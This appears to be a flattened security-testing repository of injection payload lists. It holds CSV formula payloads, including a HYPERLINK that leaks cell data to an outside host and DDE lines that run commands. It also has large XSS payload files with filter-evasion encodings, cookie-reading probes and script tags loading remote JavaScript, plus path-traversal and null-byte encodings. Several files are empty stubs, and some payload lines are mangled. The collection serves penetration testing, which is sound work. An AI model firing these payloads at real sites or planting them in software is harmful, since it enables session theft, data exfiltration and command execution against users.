├── ASS ├── OWASP_Application_Security_Verification_Standard_3.0.1.pdf └── README.md ├── CSVInjection └── CSVInjection.md ├── CrossSiteScripting-XSS ├── AdvancedPayload.txt ├── XSS.md └── xss-2016.txt ├── DirectoryTriversal └── DirectoryTriversal.md ├── HowTo.md ├── HowtoTestMaliciousFileUpload.md ├── InformationFuzzer.md ├── InformationGathering ├── AngryFuzzer.md ├── Dracnmap.md ├── NMap.md ├── NetZapper.md ├── ReconDog.md ├── Sublist3r.md ├── ToolsForInformationGathering.md └── YukiChan.md ├── Kali Linux └── UpgradeKaliLinux.md ├── LDAPInjection ├── Intruders └── LdapInjection.md ├── NoSQLInjection └── NoSQLInjection.md ├── README.md ├── SQLInjection ├── Intruders │ ├── Auth_Bypass.txt │ └── ByPass_Auth_lv2.txt ├── PostgresSQL.md ├── SQLInjection.md └── SQLiteInjection.md ├── SQLMap.md ├── VulnerabilitiesScanners.md ├── icon.png └── sql injection.png /ASS/OWASP_Application_Security_Verification_Standard_3.0.1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/josdoaitran/payload-for-security-testing/d6c38ee272f97fe234ccb2f287310d42d3d1a6b1/ASS/OWASP_Application_Security_Verification_Standard_3.0.1.pdf -------------------------------------------------------------------------------- /ASS/README.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /CSVInjection/CSVInjection.md: -------------------------------------------------------------------------------- 1 | # CSV_Injection 2 | 3 | ## Payload 4 | ``` 5 | =HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for further information") 6 | =DDE(server; file; item; mode) 7 | =DDE("cmd";"/C calc";"__DdeLink_60_870516294") 8 | =cmd|' /C calc'!A0 9 | 10 | DDE ("cmd";"/C calc";"!A0")A0 11 | @SUM(1+1)*cmd|' /C calc'!A0 12 | 13 | Technical Details of the above payload: 14 | cmd is the name the server can respond to whenever a client is trying to access the server 15 | /C calc is the file name which in our case is the calc(i.e the calc.exe) 16 | !A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data 17 | ``` 18 | Any formula can be started with 19 | ``` 20 | = 21 | + 22 | – 23 | @ 24 | ``` 25 | ## Reference: 26 | * https://www.owasp.org/index.php/CSV_Injection 27 | -------------------------------------------------------------------------------- /CrossSiteScripting-XSS/AdvancedPayload.txt: -------------------------------------------------------------------------------- 1 | "> 2 | "> 3 | ">

4 | ">

Clickme

7 | ">Clickme 8 | ">Clickme 9 | ">click 10 | ">

11 | "><a/href=javascript:co\u006efir\u006d("1")>clickme</a>
12 | "><script>co\u006efir\u006d`1`</script>
13 | "><ScRiPt>co\u006efir\u006d`1`</ScRiPt>
14 | "><img src=x onerror=co\u006efir\u006d`1`>
15 | "><svg/onload=co\u006efir\u006d`1`>
16 | "><iframe/src=javascript:co\u006efir\u006d%28 1%29>
17 | "><h1 onclick=co\u006efir\u006d(1)>Clickme</h1>
18 | "><a href=javascript:prompt%28 1%29>Clickme</a>
19 | "><a href="javascript:co\u006efir\u006d%28 1%29">Clickme</a>
20 | "><textarea autofocus onfocus=co\u006efir\u006d(1)>
21 | "><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
22 | "><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
23 | "><img/src=x%0Aonerror=prompt`1`>
24 | "><iframe srcdoc="<img src=x:x onerror=alert(1)>">
25 | "><h1/ondrag=co\u006efir\u006d`1`)>DragMe</h1>
26 |

--------------------------------------------------------------------------------
/CrossSiteScripting-XSS/xss-2016.txt:
--------------------------------------------------------------------------------
  1 | <script>alert(123)</script>
  2 | <script>alert("hellox worldss");</script>
  3 | javascript:alert("hellox worldss")
  4 | <img src="javascript:alert('XSS');">
  5 | <img src=javascript:alert("XSS")>
  6 | <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  7 | <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  8 | <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  9 | <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
 10 | <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 11 | <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 12 | <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 13 | <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 14 | <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
 15 | <<SCRIPT>alert("XSS");//<</SCRIPT>
 16 | <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
 17 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search
 18 | <script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510
 19 | <script>alert("XSS");</script>&search=1
 20 | 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search
 21 | <h1><font color=blue>hellox worldss</h1>
 22 | <BODY ONLOAD=alert('hellox worldss')>
 23 | <input onfocus=write(XSS) autofocus>
 24 | <input onblur=write(XSS) autofocus><input autofocus>
 25 | <body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
 26 | <form><button formaction="javascript:alert(XSS)">lol
 27 | <img src=x onerror=alert(XSS)//">
 28 | <![><img src="]><img src=x onerror=alert(XSS)//">
 29 | <style><img src="</style><img src=x onerror=alert(XSS)//">
 30 | <? foo="><script>alert(1)</script>">
 31 | <! foo="><script>alert(1)</script>">
 32 | </ foo="><script>alert(1)</script>">
 33 | <? foo="><x foo='?><script>alert(1)</script>'>">
 34 | <! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">
 35 | <% foo><x foo="%><script>alert(123)</script>">
 36 | <div style="font-family:'foo
;color:red;';">LOL
 37 | LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>
 38 | <script>({0:#0=alert/#0#/#0#(0)})</script>
 39 | <svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>
 40 | <SCRIPT>alert(/XSS/.source)</SCRIPT>
 41 | \\";alert('XSS');//
 42 | </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>
 43 | <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">
 44 | <BODY BACKGROUND=\"javascript:alert('XSS')\">
 45 | <BODY ONLOAD=alert('XSS')>
 46 | <IMG DYNSRC=\"javascript:alert('XSS')\">
 47 | <IMG LOWSRC=\"javascript:alert('XSS')\">
 48 | <BGSOUND SRC=\"javascript:alert('XSS');\">
 49 | <BR SIZE=\"&{alert('XSS')}\">
 50 | <LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>
 51 | <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">
 52 | <LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">
 53 | <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
 54 | <META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">
 55 | <STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>
 56 | <XSS STYLE=\"behavior: url(xss.htc);\">
 57 | <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
 58 | <IMG SRC='vbscript:msgbox(\"XSS\")'>
 59 | <IMG SRC=\"mocha:[code]\">
 60 | <IMG SRC=\"livescript:[code]\">
 61 | žscriptualert(EXSSE)ž/scriptu
 62 | <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
 63 | <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">
 64 | <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"
 65 | <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>
 66 | <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
 67 | <TABLE BACKGROUND=\"javascript:alert('XSS')\">
 68 | <TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">
 69 | <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
 70 | <DIV STYLE=\"background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029\">
 71 | <DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">
 72 | <DIV STYLE=\"width: expression(alert('XSS'));\">
 73 | <STYLE>@im\port'\ja\vasc\ript:alert(\"XSS\")';</STYLE>
 74 | <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">
 75 | <XSS STYLE=\"xss:expression(alert('XSS'))\">
 76 | exp/*<A STYLE='no\xss:noxss(\"*//*\");
 77 | xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>
 78 | <STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>
 79 | <STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>
 80 | <STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>
 81 | 
 84 | <BASE HREF=\"javascript:alert('XSS');//\">
 85 | <OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>
 86 | <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
 87 | <EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>
 88 | <EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>
 89 | a=\"get\";
 90 | b=\"URL(\\"\";
 91 | c=\"javascript:\";
 92 | d=\"alert('XSS');\\")\";
 93 | eval(a+b+c+d);
 94 | <HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>
 95 | <XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>
 96 | </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
 97 | <XML ID=\"xss\"><I><B><IMG SRC=\"javascript:alert('XSS')\"></B></I></XML>
 98 | <SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>
 99 | <XML SRC=\"xsstest.xml\" ID=I></XML>
100 | <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
101 | <HTML><BODY>
102 | <?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">
103 | <?import namespace=\"t\" implementation=\"#default#time2\">
104 | <t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">
105 | </BODY></HTML>
106 | <SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>
107 | 
108 | <? echo('<SCR)';
109 | echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>
110 | <IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">
111 | Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
112 | <META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">
113 | <HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
114 | <SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
115 | <SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
116 | <SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
117 | <SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
118 | <SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
119 | <SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
120 | <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
121 | <A HREF=\"http://66.102.7.147/\">XSS</A>
122 | <A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>
123 | <A HREF=\"http://1113982867/\">XSS</A>
124 | <A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>
125 | <A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>
126 | <A HREF=\"htt	p://6	6.000146.0x7.147/\">XSS</A>
127 | <A HREF=\"//www.google.com/\">XSS</A>
128 | <A HREF=\"//google\">XSS</A>
129 | <A HREF=\"http://ha.ckers.org@google\">XSS</A>
130 | <A HREF=\"http://google:ha.ckers.org\">XSS</A>
131 | <A HREF=\"http://google.com/\">XSS</A>
132 | <A HREF=\"http://www.google.com./\">XSS</A>
133 | <A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>
134 | <A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>
135 | <
136 | %3C
137 | <
138 | <
139 | <
140 | <
141 | <
142 | <
143 | <
144 | <
145 | <
146 | <
147 | <
148 | <
149 | <
150 | <
151 | <
152 | <
153 | <
154 | <
155 | <
156 | <
157 | <
158 | <
159 | <
160 | <
161 | <
162 | <
163 | <
164 | <
165 | <
166 | <
167 | <
168 | <
169 | <
170 | <
171 | <
172 | <
173 | <
174 | <
175 | <
176 | <
177 | <
178 | <
179 | <
180 | <
181 | <
182 | <
183 | <
184 | <
185 | <
186 | <
187 | <
188 | <
189 | <
190 | <
191 | <
192 | <
193 | <
194 | <
195 | <
196 | \x3c
197 | \x3C
198 | \u003c
199 | \u003C
200 | <iframe src=http://ha.ckers.org/scriptlet.html>
201 | <IMG SRC=\"javascript:alert('XSS')\"
202 | <SCRIPT SRC=//ha.ckers.org/.js>
203 | <SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
204 | <<SCRIPT>alert(\"XSS\");//<</SCRIPT>
205 | <SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
206 | <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(\"XSS\")>
207 | <SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>
208 | <IMG SRC=\"   javascript:alert('XSS');\">
209 | perl -e 'print \"<SCR\0IPT>alert(\\"XSS\\")</SCR\0IPT>\";' > out
210 | perl -e 'print \"<IMG SRC=java\0script:alert(\\"XSS\\")>\";' > out
211 | <IMG SRC=\"javascript:alert('XSS');\">
212 | <IMG SRC=\"jav
ascript:alert('XSS');\">
213 | <IMG SRC=\"jav	ascript:alert('XSS');\">
214 | <IMG SRC=javascript:alert('XSS')>
215 | <IMG SRC=javascript:alert('XSS')>
216 | <IMG SRC=javascript:alert('XSS')>
217 | <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
218 | <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">
219 | <IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>
220 | <IMG SRC=javascript:alert("XSS")>
221 | <IMG SRC=JaVaScRiPt:alert('XSS')>
222 | <IMG SRC=javascript:alert('XSS')>
223 | <IMG SRC=\"javascript:alert('XSS');\">
224 | <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
225 | '';!--\"<XSS>=&{()}
226 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
227 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
228 | '';!--"<XSS>=&{()}
229 | <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
230 | <IMG SRC="javascript:alert('XSS');">
231 | <IMG SRC=javascript:alert('XSS')>
232 | <IMG SRC=javascrscriptipt:alert('XSS')>
233 | <IMG SRC=JaVaScRiPt:alert('XSS')>
234 | <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
235 | <IMG SRC="   javascript:alert('XSS');">
236 | <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
237 | <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
238 | <<SCRIPT>alert("XSS");//<</SCRIPT>
239 | <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
240 | \";alert('XSS');//
241 | </TITLE><SCRIPT>alert("XSS");</SCRIPT>
242 | ¼script¾alert(¢XSS¢)¼/script¾
243 | <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
244 | <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
245 | <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
246 | <TABLE BACKGROUND="javascript:alert('XSS')">
247 | <TABLE><TD BACKGROUND="javascript:alert('XSS')">
248 | <DIV STYLE="background-image: url(javascript:alert('XSS'))">
249 | <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
250 | <DIV STYLE="width: expression(alert('XSS'));">
251 | <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
252 | <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
253 | <XSS STYLE="xss:expression(alert('XSS'))">
254 | exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
255 | <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
256 | a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
257 | <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
258 | <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>
259 | <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
260 | <form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION
261 | <form><button formaction="javascript:alert(123)">crosssitespt
262 | <frameset onload=alert(123)>
263 | <img src=x onerror=alert(123)//">
264 | <style><img src="</style><img src=x onerror=alert(123)//">
265 | <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
266 | <embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
267 | <embed src="javascript:alert(1)">
268 | <? foo="><script>alert(1)</script>">
269 | <! foo="><script>alert(1)</script>">
270 | </ foo="><script>alert(1)</script>">
271 | <script>({0:#0=alert/#0#/#0#(123)})</script>
272 | <script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>
273 | <script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>
274 | <script src="#">{alert(1)}</script>;1
275 | <script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>
276 | <svg xmlns="#"><script>alert(1)</script></svg>
277 | <svg onload="javascript:alert(123)" xmlns="#"></svg>
278 | <iframe xmlns="#" src="javascript:alert(1)"></iframe>
279 | +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
280 | %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-
281 | +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
282 | %2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-
283 | %253cscript%253ealert(document.cookie)%253c/script%253e
284 | “><s”%2b”cript>alert(document.cookie)</script>
285 | “><ScRiPt>alert(document.cookie)</script>
286 | “><<script>alert(document.cookie);//<</script>
287 | foo%00<script>alert(document.cookie)</script>
288 | <scr<script>ipt>alert(document.cookie)</scr</script>ipt>
289 | %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
290 | ‘; alert(document.cookie); var foo=’
291 | foo\’; alert(document.cookie);//’;
292 | </script><script >alert(document.cookie)</script>
293 | <img src=asdf onerror=alert(document.cookie)>
294 | <BODY ONLOAD=alert(’XSS’)>
295 | <script>alert(1)</script>
296 | "><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
297 | <video src=1 onerror=alert(1)>
298 | <audio src=1 onerror=alert(1)>
299 | %u0025%u0075%u0066%u0066%u0031%u0063%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065%u0061%u006c%u0065%u0072%u0074%u0028%u0018%u0058%u0053%u0053%u0019%u0029%u003b%u0025%u0075%u0066%u0066%u0031%u0063%u002f%u0073%u0063%u0072%u0069%u0070%u0074%u0025%u0075%u0066%u0066%u0031%u0065
300 | %uff1cscript%uff1ealert(XSS);%uff1c/script%uff1e
301 | %uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
302 | %uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
303 | %uff1cscript%uff1ealert%uff08%uff07XSS%uff07%uff09%uff1b%uff1c%uff0fscript%uff1e
304 | %uff1cscript%uff1ealert%uff081uff09%uff1b%uff1c%uff0fscript%uff1e
305 | %uff1cscript%uff1ealert(1);%uff1c/script%uff1e
306 | %uff02%uff1e
307 | %uff02%uff1e%uff1cscript%uff1ealert(XSS);%uff1c/script%uff1e
308 | %uff02%uff1e%uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
309 | %uff02%uff1e%uff1cscript%uff1ealert(%uff07XSS%uff07);%uff1c/script%uff1e
310 | %uff02%uff1e%uff1cscript%uff1ealert%uff08%uff07XSS%uff07%uff09%uff1b%uff1c%uff0fscript%uff1e
311 | %uff02%uff1e%uff1cscript%uff1ealert%uff081uff09%uff1b%uff1c%uff0fscript%uff1e
312 | %uff02%uff1e%uff1cscript%uff1ealert(1);%uff1c/script%uff1e
313 | %u003cscript%u003ealert(XSS);%u003c/script%u003e
314 | %u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
315 | %u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
316 | %u003cscript%u003ealert%u0028%u0027XSS%u0027%u0029%u003b%u003c%uff0fscript%u003e
317 | %u003cscript%u003ealert%u00281uff09%u003b%u003c%uff0fscript%u003e
318 | %u003cscript%u003ealert(1);%u003c/script%u003e
319 | %u0022%u003e
320 | %u0022%u003e%u003cscript%u003ealert(XSS);%u003c/script%u003e
321 | %u0022%u003e%u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
322 | %u0022%u003e%u003cscript%u003ealert(%u0027XSS%u0027);%u003c/script%u003e
323 | %u0022%u003e%u003cscript%u003ealert%u0028%u0027XSS%u0027%u0029%u003b%u003c%uff0fscript%u003e
324 | %u0022%u003e%u003cscript%u003ealert(1);%u003c/script%u003e
325 | /"onafterscriptexecute=alert('XSS') 1='
326 | 
327 | 
328 |

--------------------------------------------------------------------------------
/DirectoryTriversal/DirectoryTriversal.md:
--------------------------------------------------------------------------------
 1 | # How to Test for Path Traversal Vulnerabilities
 2 | 
 3 | ## OWASP
 4 | See the OWASP Testing Guide article on how to Test for Path Traversal Vulnerabilities.
 5 | 
 6 | **Description**
 7 | 
 8 | * Request variations
 9 | Encoding and double encoding:
10 | 
11 | ```
12 | %2e%2e%2f represents ../
13 | %2e%2e/ represents ../
14 | ..%2f represents ../ 
15 | %2e%2e%5c represents ..\
16 | %2e%2e\ represents ..\ 
17 | ..%5c represents ..\ 
18 | %252e%252e%255c represents ..\ 
19 | ..%255c represents ..\ and so on. 
20 | ```
21 | * Percent encoding (aka URL encoding)
22 | 
23 | Note that web containers perform one level of decoding on percent encoded values from forms and URLs.
24 | ```
25 | ..%c0%af represents ../ 
26 | ..%c1%9c represents ..\ 
27 | ```
28 | 
29 | * OS specific
30 | 
31 | _UNIX_
32 | ```
33 | Root directory:  “ / “ 
34 | Directory separator: “ / “
35 | ```
36 | _WINDOWS_
37 | ```
38 | Root directory: “  <partition letter> : \ “
39 | Directory separator: “ / “ or “ \ ” 
40 | Note that windows allows filenames to be followed by extra . \ / characters.
41 | ```
42 | In many operating systems, null bytes %00 can be injected to terminate the filename. For example, sending a parameter like:
43 | ```
44 | ?file=secret.doc%00.pdf
45 | ```
46 | 
47 | will result in the Java application seeing a string that ends with ".pdf" and the operating system will see a file that ends in ".doc". Attackers may use this trick to bypass validation routines.
48 | 
49 | ## Local/Remote File Inclusion
50 | 
51 | The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application.
52 | 
53 | Interesting files to check out :
54 | 
55 | ```
56 | 
57 | ```
58 | 
59 | # Reference
60 | 
61 | * https://www.owasp.org/index.php/Path_Traversal
62 | *

--------------------------------------------------------------------------------
/HowTo.md:
--------------------------------------------------------------------------------
 1 | # How to
 2 | 
 3 | ## Create a macilious file
 4 | 
 5 | 
 6 | Eicar file:
 7 | 
 8 | _References:_ http://www.eicar.org
 9 | 
10 | 
11 | 
12 | ## Add embedded content file to Image file
13 | 
14 |  *Steps:*
15 | 
16 | 
17 | ## Create a Pdf with embedded file
18 | 
19 |  *Steps*

--------------------------------------------------------------------------------
/HowtoTestMaliciousFileUpload.md:
--------------------------------------------------------------------------------
 1 | # How to test malicious file upload
 2 | 
 3 | ## Overview
 4 | 
 5 | Eicar file
 6 | 
 7 | Malicious file with Kali Linux
 8 | 
 9 | 
10 | ## Refference
11 | 
12 |

--------------------------------------------------------------------------------
/InformationFuzzer.md:
--------------------------------------------------------------------------------
1 | # InformationFuzzer
2 | ```https://github.com/ihebski/angryFuzzer```
3 | ## Install and Setup
4 | git clone 
5 |

--------------------------------------------------------------------------------
/InformationGathering/AngryFuzzer.md:
--------------------------------------------------------------------------------
 1 | # Angery Fuzzer
 2 | 
 3 | ## Install
 4 | ```
 5 | https://github.com/ihebski/angryFuzzer
 6 | 
 7 | ```
 8 | ## Statrt app
 9 | ```
10 | oaitran@kali:~/Documents/Tools/angryFuzzer$ ls -ltr
11 | total 24
12 | -rw-r--r-- 1 doaitran doaitran 1738 Jul  2 15:09 README.md
13 | -rw-r--r-- 1 doaitran doaitran 4735 Jul  2 15:09 angryFuzzer.py
14 | drwxr-xr-x 9 doaitran doaitran 4096 Jul  2 15:09 fuzzdb
15 | -rw-r--r-- 1 doaitran doaitran   33 Jul  2 15:09 requirements.txt
